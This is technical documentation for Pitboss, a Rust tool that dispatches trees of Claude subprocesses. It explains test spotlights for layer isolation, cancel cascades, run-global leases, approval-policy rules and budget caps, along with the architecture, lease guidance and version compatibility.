|---|---|---|---|
| 01 | smoke-hello-sublead | Depth-2 manifest dispatches; allow_subleads, max_subleads, [lead.sublead_defaults] all parse and resolve. summary.json shows tasks_failed=0. | cargo test --test dogfood_fake_flows |
| 02 | Strict-tree isolation | Per-layer KV isolation; root cannot read sub-tree state without read_down; strict peer visibility. | dogfood_isolation_strict_tree |
| 03 | Kill-cascade drain | Root cancel cascades depth-first through all sub-leads and workers within 200ms. | dogfood_kill_cascade_drain |
| 04 | Run-global lease contention | Two sub-leads competing for the same run_lease_acquire key serialize correctly. | dogfood_run_lease_contention |
| 05 | Approval policy auto-filter | [[approval_policy]] rules auto-approve matching requests before they reach the operator queue. | dogfood_policy_auto_filter |
| 06 | Envelope cap enforcement | max_sublead_budget_usd cap rejects oversized spawn attempts pre-state; clean retry succeeds. | dogfood_envelope_cap_rejection |
Real spotlights (API-gated)
| # | Name | Notes |
|---|---|---|
| R1 | real-root-spawns-sublead | Real haiku lead calls spawn_sublead at least once. ~$0.05. |
| R2 | real-kill-with-reason | Kill-with-reason stub (full orchestration deferred). |
| R3 | real-reject-with-reason | Lead adapts output format after auto_reject approval response. |
Real spotlights are in examples/dogfood/real/. Run with:

```shell
PITBOSS_DOGFOOD_REAL=1 cargo test --test dogfood_real_flows -- --ignored
```
Spotlight #02: Strict-tree isolation
Source: examples/dogfood/fake/02-isolation-strict-tree/
What it demonstrates
This spotlight exercises per-layer KV store isolation and strict peer visibility in a depth-2 dispatch.
A root lead decomposes a multi-phase job into two parallel sub-trees:
- S1 — “phase 1: gather inputs”
- S2 — “phase 2: process outputs”
Each sub-lead writes its progress to /shared/progress. The spotlight proves:
- KV isolation: S1's `/shared/progress` and S2's `/shared/progress` live in separate layer stores. Each sub-lead reads back its own write; neither can observe the other's.
- Root isolation: Root's `/shared/progress` is in a third, independent store. After S1 and S2 write their progress, root's layer still has no entry at that path.
- Strict peer visibility: Workers within the same layer cannot read each other's `/peer/<id>/*` slots. The MCP server rejects such reads with a "strict peer visibility" error.
- Layer-lead privilege: The root lead (as layer lead of the root layer) CAN read any worker's `/peer/<id>/*` slot in the root layer.
How to run
This spotlight is verified via an in-process integration test (no real subprocess or API dependency):

```shell
cargo test --test dogfood_fake_flows dogfood_isolation_strict_tree
```
The test constructs a DispatchState and McpServer in-process and drives them via FakeMcpClient over a Unix socket.
The run.sh script prints instructions pointing to this cargo invocation.
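The isolation the test asserts can be modeled in a few lines of Rust. This is a minimal sketch — `LayerKv` is a hypothetical stand-in, not the real pitboss store type — showing why identical paths never collide across layers: each layer owns an independent map.

```rust
use std::collections::HashMap;

// Hypothetical stand-in for a per-layer KV store: each layer gets its own
// independent map, so the same path in two layers never collides.
#[derive(Default)]
struct LayerKv(HashMap<String, String>);

impl LayerKv {
    fn put(&mut self, path: &str, val: &str) {
        self.0.insert(path.into(), val.into());
    }
    fn get(&self, path: &str) -> Option<&String> {
        self.0.get(path)
    }
}

fn main() {
    let root = LayerKv::default();
    let mut s1 = LayerKv::default();
    let mut s2 = LayerKv::default();

    // Each sub-lead writes progress to the same path in its own layer store.
    s1.put("/shared/progress", "phase 1: gather inputs");
    s2.put("/shared/progress", "phase 2: process outputs");

    // Each sub-lead reads back its own write; neither observes the other's.
    assert_eq!(s1.get("/shared/progress").unwrap(), "phase 1: gather inputs");
    assert_eq!(s2.get("/shared/progress").unwrap(), "phase 2: process outputs");

    // Root's layer still has no entry at that path: isolation holds.
    assert!(root.get("/shared/progress").is_none());
}
```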
Key assertions
See expected-observables.md for the full plain-English description of expected behavior.
Why this matters
Without strict-tree isolation, a noisy sub-tree could observe another sub-tree’s partial state and corrupt its coordination logic. The KV isolation guarantee means each sub-tree can be reasoned about independently — operators can audit one phase without worrying about contamination from another.
Related concepts
- Depth-2 sub-leads — authorization model
- Leases & coordination — KV namespaces
- Architecture: The two-layer model — how layers are structured
Spotlight #03: Kill-cascade drain
Source: examples/dogfood/fake/03-kill-cascade-drain/
What it demonstrates
This spotlight exercises depth-first cascade cancellation with a grace window in a depth-2 dispatch.
Scenario: An operator kicks off a long-running dispatch — a root lead that has spawned two sub-leads (S1 for “phase 1” and S2 for “phase 2”), each with two active workers. Partway through, the operator realizes something is wrong (wrong prompt, runaway cost, unexpected output) and presses cancel.
Within the drain grace window, the root cancel cascades depth-first through the entire sub-tree:
- Root cancel token is triggered
- Each sub-lead’s cancel token is triggered
- Each sub-lead’s worker cancel tokens are triggered
No straggler processes are left running and burning budget.
How to run
```shell
cargo test --test dogfood_fake_flows dogfood_kill_cascade_drain
```
The test constructs a DispatchState and McpServer in-process, spawns two sub-leads via the MCP spawn_sublead tool, injects two simulated worker cancel tokens into each sub-tree, triggers root cancel, and asserts that every token in the tree reaches the draining state within 200ms.
The run.sh script prints instructions pointing to this cargo invocation.
Why cascade matters
Without explicit cascade, cancelling root would stop the root lead process but sub-lead sessions and their workers would keep running — consuming API budget and writing to the shared store — until they timed out or were killed by an external signal.
The cascade watcher installed by install_cascade_cancel_watcher ensures the drain signal propagates to every node in the tree synchronously within the tokio event loop. The full dispatch shuts down cleanly inside the grace window.
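The cascade shape can be sketched as a toy token tree. This is illustrative only — the real implementation trips async cancel tokens inside the tokio event loop via `install_cascade_cancel_watcher` — but the depth-first propagation logic is the same: cancelling the root trips every descendant's drain flag.

```rust
use std::sync::atomic::{AtomicBool, Ordering};

// Toy model of the cancel tree: one drain flag per node, children nested.
struct Node {
    draining: AtomicBool,
    children: Vec<Node>,
}

impl Node {
    fn new(children: Vec<Node>) -> Self {
        Node { draining: AtomicBool::new(false), children }
    }
    fn cancel(&self) {
        // Trip this node's token, then cascade depth-first.
        self.draining.store(true, Ordering::SeqCst);
        for child in &self.children {
            child.cancel();
        }
    }
    fn all_draining(&self) -> bool {
        self.draining.load(Ordering::SeqCst)
            && self.children.iter().all(Node::all_draining)
    }
}

fn main() {
    // The spotlight's shape: root → two sub-leads, each with two workers.
    let leaf = || Node::new(vec![]);
    let root = Node::new(vec![
        Node::new(vec![leaf(), leaf()]), // S1: W1, W2
        Node::new(vec![leaf(), leaf()]), // S2: W3, W4
    ]);
    assert!(!root.all_draining());
    root.cancel(); // operator presses cancel at the root
    assert!(root.all_draining()); // no straggler left un-drained
}
```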
Key assertions
See expected-observables.md for the full scenario with timing expectations.
Related concepts
- Depth-2 sub-leads — cancel cascade section
- Architecture: The two-layer model — tree structure
- TUI — `X` key cancels entire run
Spotlight #04: Run-global lease contention
Source: examples/dogfood/fake/04-run-lease-contention/
What it demonstrates
This spotlight exercises run-global lease coordination across sub-trees in a depth-2 dispatch.
Scenario: An operator has a shared filesystem resource (e.g., output.json) that multiple sub-leads need exclusive write access to. The run-global lease API (run_lease_acquire / run_lease_release) provides cross-tree coordination.
Two sub-leads (S1 and S2) compete for the same lease key:
- S1 acquires the lease first and holds it successfully
- S2 attempts to acquire the same lease — blocked, with S1 named as current holder
- S1 releases the lease
- S2 retries and acquires successfully
How to run
```shell
cargo test --test dogfood_fake_flows dogfood_run_lease_contention
```
The test constructs a DispatchState and McpServer in-process, spawns two sub-leads, drives them through the acquire/release dance, and asserts that blocking, release, and reacquisition work correctly.
The run.sh script prints instructions pointing to this cargo invocation.
The key distinction this spotlight demonstrates
| Lease type | Scope | Use for |
|---|---|---|
| `/leases/*` via `lease_acquire` | Per-layer (sub-tree internal) | Resources only one sub-tree writes to |
| `run_lease_acquire` | Run-global (spans all sub-trees) | Operator filesystem paths, shared services |
If S1 and S2 used per-layer /leases/* instead of run_lease_acquire, they would each get their own independent /leases/output-file with no contention — which is wrong when they’re both trying to write the same real file.
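The acquire/block/release/retry sequence the spotlight asserts can be sketched with a toy run-global registry. The `LeaseRegistry` shape here is hypothetical (the real one lives on `DispatchState` and carries TTLs); it shows only the serialization behavior.

```rust
use std::collections::HashMap;

// Toy run-global lease registry: one map spanning all sub-trees, so two
// sub-leads contending for the same key serialize against each other.
#[derive(Default)]
struct LeaseRegistry {
    held: HashMap<String, String>, // key → holding actor
}

impl LeaseRegistry {
    /// Try to acquire `key` for `actor`; on contention, name the holder.
    fn acquire(&mut self, key: &str, actor: &str) -> Result<(), String> {
        match self.held.get(key) {
            Some(holder) => Err(format!("lease {key:?} held by {holder}")),
            None => {
                self.held.insert(key.into(), actor.into());
                Ok(())
            }
        }
    }
    fn release(&mut self, key: &str) {
        self.held.remove(key);
    }
}

fn main() {
    let mut reg = LeaseRegistry::default();
    assert!(reg.acquire("output.json", "S1").is_ok());       // S1 acquires first
    let err = reg.acquire("output.json", "S2").unwrap_err(); // S2 is blocked
    assert!(err.contains("S1"));                             // holder is named
    reg.release("output.json");                              // S1 releases
    assert!(reg.acquire("output.json", "S2").is_ok());       // S2 retry succeeds
}
```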
Key assertions
See expected-observables.md for the full scenario with expected lease state transitions.
Related concepts
- Leases & coordination — per-layer vs run-global
- Architecture: Lease scope selection — decision guide
- Coordination & state — `run_lease_acquire` / `run_lease_release` signatures
Spotlight #05: Approval policy auto-filter
Source: examples/dogfood/fake/05-policy-auto-filter/
What it demonstrates
This spotlight exercises [[approval_policy]] declarative auto-filtering in a depth-2 dispatch.
Scenario: An operator configures a deterministic policy to auto-approve routine tool-use from a trusted sub-lead (S1) while blocking plan-category approvals — reducing approval noise at scale.
The spotlight proves four things:
- Rule-based auto-approval: When S1 requests tool-use approval, Rule 1 (`actor = root→S1`, `category = ToolUse`) immediately approves without operator involvement.
- Actor-specific filtering: S2 makes an identical tool-use request, but since Rule 1 only matches `root→S1`, S2's request falls through to the operator queue.
- Category-based blocking: When S1 submits a plan approval, Rule 2 (`category = Plan`, `action = block`) forces operator review regardless of actor.
- Reduced operator noise: Only non-matching requests land in the operator's queue. S1's routine tool-use never alerts the operator.
The policy configuration
```toml
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"

[[approval_policy]]
match = { category = "plan" }
action = "block"
```
First-match-wins. A request from S1 with category = ToolUse matches Rule 1 → auto-approved. A request from S1 with category = Plan does not match Rule 1 (wrong category) → falls to Rule 2 → blocked for operator.
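First-match-wins evaluation can be sketched as a linear scan over the rules. Field and variant names below are illustrative, not pitboss's actual types; a `None` result stands for "falls through to the operator queue".

```rust
// Hypothetical model of [[approval_policy]] rules and their evaluation.
#[derive(Clone, Copy, PartialEq)]
enum Category { ToolUse, Plan }

#[derive(Clone, Copy, PartialEq, Debug)]
enum Action { AutoApprove, Block }

struct Rule {
    actor: Option<&'static str>,    // None = matches any actor
    category: Option<Category>,     // None = matches any category
    action: Action,
}

/// First matching rule decides; no match falls through to the operator queue.
fn evaluate(rules: &[Rule], actor: &str, category: Category) -> Option<Action> {
    rules
        .iter()
        .find(|r| {
            r.actor.map_or(true, |a| a == actor)
                && r.category.map_or(true, |c| c == category)
        })
        .map(|r| r.action)
}

fn main() {
    let rules = [
        Rule { actor: Some("root→S1"), category: Some(Category::ToolUse), action: Action::AutoApprove },
        Rule { actor: None, category: Some(Category::Plan), action: Action::Block },
    ];
    // S1 tool-use matches Rule 1 → auto-approved.
    assert_eq!(evaluate(&rules, "root→S1", Category::ToolUse), Some(Action::AutoApprove));
    // S2's identical request matches neither rule → operator queue.
    assert_eq!(evaluate(&rules, "root→S2", Category::ToolUse), None);
    // S1's plan approval skips Rule 1 (wrong category), hits Rule 2 → blocked.
    assert_eq!(evaluate(&rules, "root→S1", Category::Plan), Some(Action::Block));
}
```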
How to run
```shell
cargo test --test dogfood_fake_flows dogfood_policy_auto_filter
```
The test asserts that:
- S1's auto-approved request does not appear in the operator queue
- S2's request and S1's plan approval do appear in the queue
- Queue entries exist only for requests not auto-approved by a matching rule
The run.sh script prints instructions pointing to this cargo invocation.
Why deterministic rules (not LLM-evaluated)
Approval policies are Rust-evaluated — always deterministic, zero latency, auditable. This makes them suitable for high-volume auto-approvals (e.g., “trust S1’s read-only operations”) while LLM-based approval (via propose_plan or request_approval with a rich plan) handles judgment calls that genuinely need human review.
Key assertions
See expected-observables.md for the full expected behavior.
Related concepts
- Approvals — `[[approval_policy]]` reference
- MCP approvals — `request_approval` / `propose_plan` tool reference
Spotlight #06: Envelope cap enforcement
Source: examples/dogfood/fake/06-envelope-cap-rejection/
What it demonstrates
This spotlight exercises manifest-level budget cap enforcement with clean rejection semantics in a depth-2 dispatch.
Scenario: An operator sets max_sublead_budget_usd = 3.0 as a safety rail. A root lead attempts to spawn a sub-lead with budget_usd = 5.0 (either by bad design or runaway generation). The cap enforcement rejects the spawn cleanly — no partial state, no phantom reservation.
The spotlight proves four things:
- Cap rejection is pre-state: When the envelope budget exceeds `max_sublead_budget_usd`, `spawn_sublead` returns an error before any state mutation. No half-spawned sub-lead is registered.
- Error message is actionable: The error names the cap ("exceeds per-sublead cap"), allowing Claude to understand the constraint and retry with a smaller budget.
- Clean state after rejection: After a rejected spawn, `state.subleads` is empty (no partial registration) and `reserved_usd == 0` (no phantom reservation).
- Successful retry with compliant budget: Retrying with `budget_usd = 2.0` (within the 3.0 cap) succeeds; the sub-lead is registered and `reserved_usd = 2.0`.
The manifest cap
```toml
[[lead]]
allow_subleads = true
max_sublead_budget_usd = 3.0
```
How to run
```shell
cargo test --test dogfood_fake_flows dogfood_envelope_cap_rejection
```
The test:
- Constructs a `DispatchState` with `max_sublead_budget_usd = 3.0`
- Attempts `spawn_sublead(budget_usd=5.0)` → expects MCP error
- Verifies no partial state and no budget reserved
- Retries with `spawn_sublead(budget_usd=2.0)` → expects success
The run.sh script prints instructions pointing to this cargo invocation.
Why pre-state rejection matters
Failing before any state mutation keeps the dispatch state clean and predictable. A half-spawned sub-lead with a phantom budget reservation would be difficult to diagnose and could cause downstream spawn failures or incorrect budget accounting.
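The validate-then-mutate discipline can be sketched in a few lines. The `State` shape here is hypothetical, not the real `DispatchState`; the point is that the cap check runs before any field is touched, so a rejection leaves nothing to roll back.

```rust
// Hypothetical pre-state cap check: validate the envelope first, so a
// rejected spawn leaves no partial registration and no phantom reservation.
struct State {
    cap_usd: f64,          // max_sublead_budget_usd from the manifest
    subleads: Vec<String>, // registered sub-leads
    reserved_usd: f64,     // budget reserved for sub-lead envelopes
}

impl State {
    fn spawn_sublead(&mut self, id: &str, budget_usd: f64) -> Result<(), String> {
        // Validate before mutating anything.
        if budget_usd > self.cap_usd {
            return Err(format!(
                "budget {budget_usd} exceeds per-sublead cap {}", self.cap_usd
            ));
        }
        self.subleads.push(id.into());
        self.reserved_usd += budget_usd;
        Ok(())
    }
}

fn main() {
    let mut state = State { cap_usd: 3.0, subleads: vec![], reserved_usd: 0.0 };
    // Oversized spawn: rejected pre-state.
    assert!(state.spawn_sublead("S1", 5.0).is_err());
    assert!(state.subleads.is_empty());  // no partial registration
    assert_eq!(state.reserved_usd, 0.0); // no phantom reservation
    // Compliant retry succeeds.
    assert!(state.spawn_sublead("S1", 2.0).is_ok());
    assert_eq!(state.reserved_usd, 2.0);
}
```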
Key assertions
See expected-observables.md for the full expected behavior.
Related concepts
- Depth-2 sub-leads — `max_sublead_budget_usd` and other manifest caps
- Manifest schema — `[[lead]]` field reference
- Session control — `spawn_sublead` error conditions
Architecture overview
One-screen mental model
Pitboss is a dispatcher that manages a tree of claude subprocesses under operator-defined guardrails. In the simplest case (flat mode), it’s a process pool. In the full case (depth-2 hierarchical), it’s a two-tier tree with a control plane and shared coordination state.
```text
Operator
│
├─ pitboss dispatch <manifest>
│ │
│ ├─ [root lead] ──────── MCP bridge (stdio↔unix socket)
│ │ │ │
│ │ │ MCP server ─────┘
│ │ │ │
│ │ │ ├─ DispatchState (root layer)
│ │ │ │ KvStore, LeaseRegistry, ApprovalQueue
│ │ │ │
│ │ ├─ spawn_sublead ──┤
│ │ │ │ ├─ LayerState (sub-lead S1)
│ │ │ │ │ KvStore, workers, budget
│ │ │ │ │
│ │ │ └─ [S1 lead] ──── spawn_worker → [W1, W2, W3]
│ │ │
│ │ └─ spawn_sublead ──┤
│ │ ├─ LayerState (sub-lead S2)
│ │ │
│ │ └─ [S2 lead] ──── spawn_worker → [W4, W5]
│ │
│ └─ control.sock ─────── pitboss-tui (operator floor view)
│
└─ run artifacts: ~/.local/share/pitboss/runs/<run-id>/
```
Key components
Dispatcher (pitboss)
The CLI binary. Reads the manifest, validates it, sets up the run directory, and kicks off the dispatch. In flat mode, it starts a process pool directly. In hierarchical mode, it starts the MCP server and spawns the lead subprocess with a generated --mcp-config.
MCP server
Listens on a unix socket per run. Receives tool calls from leads (and workers) via the bridge proxy. All tool handlers route through DispatchState for authorization and state mutation.
The bridge
pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched for each claude subprocess that needs MCP access. Claude Code speaks stdio JSON-RPC; the pitboss MCP server speaks unix socket. The bridge translates between them and stamps _meta (actor identity) into each forwarded call.
DispatchState
The root state object. In v0.6+, it wraps an Arc<LayerState> for the root layer plus a registry of sub-lead LayerState objects. All MCP tool handlers receive a DispatchState reference and use it to locate the right layer for authorization and coordination.
LayerState
Per-layer state: the layer’s KvStore, worker registry, budget tracking, ApprovalQueue, and cancel tokens. Workers within a layer share one LayerState. Sub-leads each get their own LayerState — this is what provides isolation.
Control socket
A unix socket (control.sock) in the run directory that the TUI connects to. The TUI sends control operations (cancel, pause, reprompt, approve) and receives push events (worker state changes, approval requests, budget updates). The dispatcher applies operations to DispatchState and broadcasts events back.
TUI (pitboss-tui)
A ratatui terminal application that connects to the control socket of a running dispatch. Read-only for finished runs (no control socket). See TUI for the operator interface.
Data flow: a worker spawn
- Lead calls `mcp__pitboss__spawn_worker` via its MCP bridge subprocess.
- The bridge reads the stdio request and forwards it to the MCP server on the unix socket, adding `_meta.actor_id` from its `--actor-id` arg.
- The MCP server handler receives the call, looks up the caller's layer in `DispatchState`, and validates the request (budget, worker cap, plan gate).
- The dispatcher spawns a `claude` subprocess with a generated `--mcp-config` (for workers: shared-store tools only) and a new worktree.
- The worker's task id and worktree path are returned to the lead via MCP response.
- The TUI receives a `WorkerSpawned` push event from the control socket and renders a new tile.
Philosophy
The model is stochastic. The pit is not.
Pitboss bets on four guarantees:
- Isolation. Each worker runs in its own git worktree. One bad hand doesn’t contaminate the next.
- Observability. Every token, every cache hit, every session id is persisted. The artifacts are on the table.
- Bounded risk. Workers, budget, and timeouts are explicit. The house knows its exposure before the first card is dealt.
- Determinism where it’s free. Stream-JSON parsing, cancellation protocol, KV authorization, approval policy matching — all Rust, all deterministic, none LLM-evaluated.
For deeper dives, see The two-layer model and Lease scope selection.
The two-layer model
Pitboss v0.6 introduced a second coordination tier. Understanding the layer structure is essential for writing correct depth-2 manifests.
Layers
A layer is the scope within which workers and leads share coordination state (KV store, leases, approval queue). In the v0.6 model:
- Root layer — always present. Contains the root lead, any direct workers the root lead spawns, and the run-global lease registry.
- Sub-lead layers — one per spawned sub-lead. Each sub-lead layer contains that sub-lead’s lead session and the workers it spawns.
Workers remain terminal: they cannot spawn anything. A sub-lead is a lead within its own layer; it can spawn workers but not other sub-leads.
```text
Root layer
├─ root lead (reads/writes root KvStore)
├─ worker W0 (if root lead calls spawn_worker directly)
└─ run-global LeaseRegistry (spans all layers)

Sub-lead S1 layer
├─ sub-lead S1 (reads/writes S1 KvStore)
├─ worker W1
└─ worker W2

Sub-lead S2 layer
├─ sub-lead S2 (reads/writes S2 KvStore)
├─ worker W3
└─ worker W4
```
Isolation by default
Sub-tree layers are opaque to root unless read_down = true is passed at spawn_sublead time. This means:
- The root lead cannot `kv_get` any path from S1's or S2's layer.
- S1 cannot `kv_get` any path from S2's layer or the root layer.
- Workers within S1 cannot see each other's `/peer/<X>/*` slots; only S1's lead and the operator can.
This isolation is not just a convention — it’s enforced at the MCP tool handler layer.
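That enforcement can be sketched as a single authorization predicate. The signature is hypothetical — the real check lives inside pitboss's MCP tool handlers — but it captures the rule: same-layer reads are allowed, and cross-layer reads only for root into a sub-tree spawned with `read_down = true`.

```rust
// Hypothetical kv_get authorization predicate: reads stay within the
// caller's own layer unless the caller is root and the target sub-tree
// was spawned with read_down = true.
fn may_read(caller_layer: &str, target_layer: &str, caller_is_root: bool, read_down: bool) -> bool {
    caller_layer == target_layer || (caller_is_root && read_down)
}

fn main() {
    // S1 reading its own layer: allowed.
    assert!(may_read("S1", "S1", false, false));
    // S1 reading S2's layer: denied.
    assert!(!may_read("S1", "S2", false, false));
    // Root reading S1 without read_down: denied.
    assert!(!may_read("root", "S1", true, false));
    // Root reading S1 spawned with read_down = true: allowed.
    assert!(may_read("root", "S1", true, true));
}
```

Note that writes never use the `read_down` branch: write access into a sub-tree namespace is never granted to root.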
The read_down escape hatch
When the root lead calls spawn_sublead(..., read_down=true), the root gains read access into that sub-tree’s KV namespace. Write access is never granted to the root for sub-tree namespaces (the sub-lead’s workers must remain the writers).
Use read_down when:
- The root lead's synthesis step needs to observe sub-tree progress without going through explicit handoff patterns (like `/peer/S1/done`).
- You're building a monitoring-style root that reports on all sub-tree states.
Avoid read_down when you want strict phase isolation — if Phase 1 shouldn’t influence Phase 2’s context, don’t give root visibility that it might inadvertently surface in Phase 2’s prompt.
The operator is always super-user
The TUI can read and write across all layers regardless of read_down. This is intentional: the operator needs unrestricted visibility for debugging and approval decisions.
Sub-leads as peers in the root layer
Sub-leads are not workers in the root layer. They appear as sub-tree containers in the TUI, not as worker tiles. The root lead tracks sub-leads via sublead_id (returned by spawn_sublead) and waits on them via wait_actor.
From the root lead’s perspective:
- `spawn_worker` → creates a worker tile in the root layer
- `spawn_sublead` → creates a sub-tree with its own layer
Both return identifiers the root lead can use with wait_actor.
Budget flow
Budget flows hierarchically:
- Operator sets `budget_usd = 20.00` on the run.
- Root lead calls `spawn_sublead(budget_usd=5.0)` → $5 is reserved from the root budget.
- Sub-lead S1 spawns workers; each worker spawn reserves an estimate from S1's $5 envelope.
- When S1 terminates, any unspent envelope returns to the root's reservable pool.
The max_sublead_budget_usd manifest cap enforces an upper bound on any single sub-lead envelope, regardless of what the root lead requests.
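The reserve-and-return arithmetic can be sketched as follows. The `RootBudget` type is hypothetical; the numbers follow the flow above, with an assumed spend of $3.25 by S1.

```rust
// Toy model of hierarchical budget flow: sub-lead envelopes are reserved
// from the root pool, and the unspent slice returns on termination.
struct RootBudget {
    total: f64,    // budget_usd on the run
    reserved: f64, // sum of outstanding reservations + settled spend
}

impl RootBudget {
    fn reservable(&self) -> f64 {
        self.total - self.reserved
    }
    fn reserve(&mut self, usd: f64) -> bool {
        if usd <= self.reservable() {
            self.reserved += usd;
            true
        } else {
            false
        }
    }
    /// On sub-lead termination, free the unspent slice of its envelope;
    /// the spent slice stays accounted against the pool.
    fn settle(&mut self, envelope: f64, spent: f64) {
        self.reserved -= envelope - spent;
    }
}

fn main() {
    let mut root = RootBudget { total: 20.0, reserved: 0.0 }; // budget_usd = 20.00
    assert!(root.reserve(5.0));           // spawn_sublead(budget_usd=5.0)
    assert_eq!(root.reservable(), 15.0);  // $5 envelope reserved
    root.settle(5.0, 3.25);               // S1 terminates having spent $3.25
    assert_eq!(root.reservable(), 16.75); // unspent $1.75 returns to the pool
}
```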
Cancel cascade
Cancellation propagates depth-first. A root cancel:
- Trips the root layer’s drain token.
- The cascade watcher finds all registered sub-leads and trips their cancel tokens.
- Each sub-lead’s cancel triggers its worker cancel tokens.
The two-phase drain at each layer ensures no straggler processes. Sub-leads spawned mid-drain are caught by a spawn-time is_draining() check.
Kill-with-reason routing
`cancel_worker(task_id, reason)` routes one hop upward:
- Cancel a worker → the worker's layer lead (sub-lead or root) receives the synthetic `[SYSTEM]` reprompt.
- Cancel a sub-lead → the root lead receives the reprompt.
The root lead is never notified for cancels that stay within a sub-tree it doesn’t own (unless it has read_down = true and is observing).
Lease scope selection
Pitboss provides two lease primitives. Choosing the right one prevents silent cross-tree collisions.
Quick rule
| Resource | Primitive to use |
|---|---|
| Internal to one sub-tree | /leases/* via lease_acquire |
| Shared across sub-trees | run_lease_acquire |
| When in doubt | run_lease_acquire |
Over-serializing is always safer than silent collision.
The two primitives
Per-layer leases: lease_acquire / lease_release
Each layer (root, S1, S2, …) has its own KvStore with its own /leases/* namespace. A lease acquired by an actor in S1 at path /leases/output-file is entirely separate from a lease acquired by an actor in S2 at the same path.
This isolation is by design. It means sub-trees can coordinate internally without knowing about each other. It also means per-layer leases provide no cross-tree serialization.
Use per-layer leases for:
- A chunk-processing counter within one phase’s workers
- A mutex for a temporary file that only one sub-tree touches
- Any resource fully scoped to a single sub-tree’s lifetime
Run-global leases: run_lease_acquire / run_lease_release
Run-global leases live on DispatchState (outside any layer) in a dedicated LeaseRegistry. A lease acquired at key "output.json" by S1 blocks S2 from acquiring the same key.
Use run-global leases for:
- A path on the operator’s filesystem that multiple sub-trees write to
- A shared service or network port that only one phase should use at a time
- Any resource that must be serialized across the entire dispatch tree
Why the split exists
Sub-tree isolation is a core guarantee. If per-layer leases were globally shared, one sub-tree’s lock could block an unrelated sub-tree — violating isolation and making sub-tree behavior dependent on sibling activity.
The run-global lease registry exists as a deliberate, explicit cross-tree escape hatch. Because it’s separate and explicitly invoked, operators and leads can reason about which resources are cross-tree-serialized without inspecting sibling sub-trees.
Auto-release on termination
Both primitive types auto-release their leases when the holding actor’s MCP session terminates (connection drop, worker crash, Ctrl-C). This prevents deadlocks from crashed workers holding leases indefinitely.
The TTL (ttl_secs) is a belt-and-suspenders backup: if the auto-release misses (e.g., an ungraceful socket close), the lease expires after the TTL.
Debugging lease contention
When run_lease_acquire or lease_acquire returns a contention error, the error message names the current holder:
```text
lease "output.json" held by actor <uuid> (S1→W2), expires in 28s
```
This lets the waiting actor know whether to retry immediately (holder is about to expire) or wait for an explicit release.
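A lead could act on that hint with a tiny parser. This helper is hypothetical — pitboss does not ship it — and is shown only to illustrate using the error text in a retry decision.

```rust
// Hypothetical helper: pull the "expires in <N>s" suffix out of a lease
// contention error, so the waiting actor can pick a backoff. Returns None
// when the error carries no TTL information.
fn expires_secs(err: &str) -> Option<u64> {
    err.rsplit("expires in ").next()?.trim_end_matches('s').parse().ok()
}

fn main() {
    let err = r#"lease "output.json" held by actor <uuid> (S1→W2), expires in 28s"#;
    // Holder expires soon → worth retrying after the TTL elapses.
    assert_eq!(expires_secs(err), Some(28));
    // No TTL info → caller falls back to a default backoff.
    assert_eq!(expires_secs("lease held by someone"), None);
}
```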
Spotlight
Spotlight #04 (Run-global lease contention) demonstrates the full acquire/block/release/retry sequence in a runnable test.
Changelog
{{#include ../../CHANGELOG.md}}
Compatibility
Pitboss makes specific backward-compatibility guarantees at each version boundary. This page summarizes the current compatibility posture for operators upgrading to or running v0.6.
v0.6.0 — depth-2 sub-leads
Backward compatible with v0.5
v0.6 is fully backward-compatible with v0.5 manifests and tooling:
- Manifests: v0.5 manifests (flat mode, hierarchical without `allow_subleads`) run unchanged. `allow_subleads` defaults to `false`; no new fields are required.
- MCP callers: v0.5 leads that only call `spawn_worker`, `wait_for_worker`, `list_workers`, etc. work identically. New tools (`spawn_sublead`, `wait_actor`, `run_lease_acquire`, `run_lease_release`) are additive and not required.
- Control-plane clients: TUI sessions connected to a v0.6 dispatcher behave identically when no sub-leads are spawned. New TUI elements (grouped grid, approval list pane) appear only when depth-2 features are used.
- Wire format: `EventEnvelope` adds `actor_path` (e.g., `"root→S1→W3"`) with `serde(skip_serializing_if = "ActorPath::is_empty")`, so v0.5 consumers parsing event streams see no change for flat or depth-1 runs.
- On-disk run artifacts: `summary.json` schema is backward-compatible. New fields are added with `#[serde(default)]`; pre-v0.6 records parse cleanly.
- SQLite: All schema migrations are idempotent. Opening a v0.5 database under v0.6 auto-migrates it.
Nothing removed in v0.6
No tools, manifest fields, CLI subcommands, or TUI behaviors were removed in v0.6. wait_for_worker is retained as a back-compat alias for wait_actor.
v0.5.0
Backward compatible with v0.4
- v0.4.x manifests run unchanged. `require_plan_approval` defaults to `false`.
- `pause_worker` gains a `mode` field; the default (`"cancel"`) matches v0.4 behavior.
- `approval_policy` defaults to `"block"`, matching v0.4.
- v0.4.x run directories deserialize with new counter fields defaulting to 0.
v0.4.0
Backward compatible with v0.3
- v0.3.x manifests run unchanged. `approval_policy` defaults to `"block"`.
- v0.3.x on-disk runs: `control.sock` absent → TUI enters observe-only mode.
- `parent_task_id` on `TaskRecord` uses `#[serde(default)]`; v0.3 records parse as `null`.
Forward-looking guarantees
Pitboss follows Semantic Versioning:
- Patch versions (0.6.x) — bug fixes only; no schema or API changes.
- Minor versions (0.7+) — additive features; existing manifests and callers continue to work.
- Major version (1.0) — reserved for breaking changes. None currently planned.
The authoritative guide to what changed in each version is CHANGELOG.md in this book (sourced directly from the repository’s CHANGELOG.md).
Checking compatibility
```shell
pitboss validate pitboss.toml
```
pitboss validate is the runtime source of truth. If a manifest field doesn’t parse, validate will report it. The binary always wins over documentation — file a PR if something here is wrong.